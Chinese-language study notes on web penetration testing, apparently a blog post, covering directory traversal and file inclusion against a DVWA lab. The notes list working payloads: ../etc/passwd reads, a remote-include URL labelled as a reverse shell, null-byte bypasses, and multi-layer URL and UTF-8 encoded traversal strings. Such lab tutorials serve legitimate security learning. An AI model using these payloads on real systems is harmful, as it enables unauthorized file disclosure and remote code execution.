Kali linux 学习笔记(四十七)Web渗透——漏洞挖掘之目录遍历和文件包含 2020.3.24

前言

本节学习目录遍历和文件包含的漏洞

1、准备

dvwa:192.168.1.118
kali:192.168.1.116

设置 dvwa 配置文件可以进行远程文件包含测试

root@metasploitable:vim /etc/php5/cgi/php.ini       
    ; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
    allow_url_include = On #把这个改成on
root@metasploitable:/etc/init.d/apache2 restart #重启apache使配置生效

然后把安全级别调为低级别

2、经典测试

一些可能可以用的漏洞如下

?file=../../../../etc/passwd
?page=file:///etc/passwd #利用系统文件路径
?home=main.cgi
?page=http://www.a.com/1.php #反弹shell
http://1.1.1.1/../../../../dir/file.txt

例子如图所示
Kali linux 学习笔记(四十七)Web渗透——漏洞挖掘之目录遍历和文件包含 2020.3.24_第1张图片

如果报了奇怪的错误
尝试绕过
用“.” “%00” #绕过文件扩展名过滤
?file=a.doc%00.php

可以用burpsuite进行url编码
url 编码或者进行双层甚至三层 url 编码

%2e%2e%2f                解码 ../
%2e%2e%5c                解码 ..\
%252e%252e%255c          解码 ..\

如图所示
Kali linux 学习笔记(四十七)Web渗透——漏洞挖掘之目录遍历和文件包含 2020.3.24_第2张图片

Unicode/UTF-8 解码

..%c0%af                     解码 ../
..%u2216
..%c1%9c                     解码 ..\

其他系统路径可能使用的字符

file.txt…
file.txt<space>
file.txt””””
file.txt<<<>>><
./././file.txt
nonexistant/../file.txt

UNC路径

\1.1.1.1\path\to\file.txt

3、目录遍历攻击

Kali linux 学习笔记(四十七)Web渗透——漏洞挖掘之目录遍历和文件包含 2020.3.24_第3张图片

你可能感兴趣的:(kali,linux,安全,linux)